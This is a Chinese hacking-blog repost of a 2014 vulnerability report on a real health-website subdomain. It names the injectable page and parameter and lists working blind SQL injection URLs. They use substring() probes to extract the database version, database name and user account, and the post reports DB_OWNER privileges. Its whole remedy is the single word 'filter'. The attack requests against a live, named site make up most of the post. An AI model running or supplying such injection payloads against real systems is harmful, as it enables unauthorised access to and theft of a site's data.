记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

39健康网某站点存在SQL注入漏洞

2014-06-10 17:30
存在注入的站点如下:http://makemoney.39.net/
 
注入页面:CommentPager.ashx
 
 
 
注入参数:tid
 
 
 
正常情况:
 
 
and 1=1
 
and 1=2返回结果不一:
 
 
嗯,用substring()函数来进行盲注吧。
 
http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20@@version),22,4)=%272005%27
 
 
 
返回正常,说明mssql是2005的:
 
 




 
 
接下来猜database:
 
http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20db_name()),1,1)=%27A%27
 
返回错误
 
http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20db_name()),1,1)=%27C%27
 
返回正常,说明数据库第一个字符是C
 
 
 
以此类推:得
 
database = Comment
 
试试注入user吧。
 
 
 
http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20user),1,1)=%27a%27
 
返回错误
 
http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20user),1,1)=%273%27
 
返回正常,以此类推得:
 
39_Comment
 
 
 
当前权限:DB_OWNER 
 
修复方案:
过滤。

知识来源: www.2cto.com/Article/201406/307634.html

阅读:94235 | 评论:1 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“39健康网某站点存在SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云